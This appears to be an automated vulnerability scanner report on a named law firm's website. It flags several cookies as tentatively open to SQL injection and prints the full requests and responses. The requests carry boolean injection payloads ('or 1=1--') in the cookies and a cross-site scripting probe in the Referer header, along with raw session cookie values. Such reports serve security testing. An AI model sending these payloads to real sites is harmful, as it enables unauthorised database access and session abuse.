Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.27. http://www.pillsburylaw.com/a [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 11939842%20or%201%3d1--%20 and 11939842%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953711939842%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Thu, 13-May-2010 00:35:53 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953711939842%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11834516;path=/
Set-Cookie: CFTOKEN=68084189;path=/
Date: Fri, 13 May 2011 00:35:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.28. http://www.pillsburylaw.com/a [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 23034469%20or%201%3d1--%20 and 23034469%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898823034469%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Thu, 13-May-2010 00:36:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898823034469%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11834548;path=/
Set-Cookie: CFTOKEN=88941658;path=/
Date: Fri, 13 May 2011 00:36:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.29. http://www.pillsburylaw.com/a [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 10682232'%20or%201%3d1--%20 and 10682232'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=10682232'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Thu, 13-May-2010 00:36:36 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=10682232'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.30. http://www.pillsburylaw.com/a [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 14521441'%20or%201%3d1--%20 and 14521441'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=14521441'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Thu, 13-May-2010 00:36:46 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=14521441'%20or%201%3d2--%20; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.31. http://www.pillsburylaw.com/a [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 67778256'%20or%201%3d1--%20 and 67778256'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=67778256'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
